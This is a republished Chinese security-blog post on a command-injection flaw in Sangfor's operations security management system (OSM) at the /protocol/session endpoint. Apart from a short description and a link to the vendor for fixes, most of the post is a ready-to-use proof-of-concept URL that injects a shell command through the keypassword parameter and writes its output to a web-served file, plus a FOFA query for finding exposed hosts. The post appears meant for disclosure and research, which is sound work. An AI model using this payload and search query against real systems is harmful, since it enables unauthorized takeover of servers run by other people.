文章总结: 深信服运维安全管理系统存在命令执行漏洞,位于/protocol/session接口。由于参数校验不严格,攻击者可注入系统命令,利用反引号执行任意命令,获取服务器完全控制权限。受影响版本为OSM<3.0.1220241106,建议用户联系厂商进行修复。
综合评分: null
文章分类: 漏洞分析,漏洞预警,WEB安全
Nday|深信服运维安全管理系统/protocol/session存在命令执行漏洞
原创
小白菜安全
小白菜安全
2025年11月23日 11:30
浙江
漏洞描述
该漏洞源于系统对/protocol/session等接口的请求参数校验不严格,攻击者可通过构造恶意请求,在参数中注入系统命令,利用反引号(`)执行任意命令,从而获取服务器完全控制权限。
资产信息
fofa:body=”/fort/login”
漏洞复现
影响版本:深信服运维安全管理系统(OSM)<3.0.12 20241106
POC
/isomp-protocol/protocol/session?keyPath=/etc/passwd&protocol=ssh&keypassword=123456%27%3Bid+%3E%20/usr/local/tomcat/webapps/fort/trust/1.txt;&sshd=1
修复
漏洞已经修复,联系厂商修复:https://www.sangfor.com.cn/
免责声明
该公众号主要是分享互联网上公开的一些漏洞poc和工具,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:小白菜安全 小白菜安全《Nday|深信服运维安全管理系统/protocol/session存在命令执行漏洞》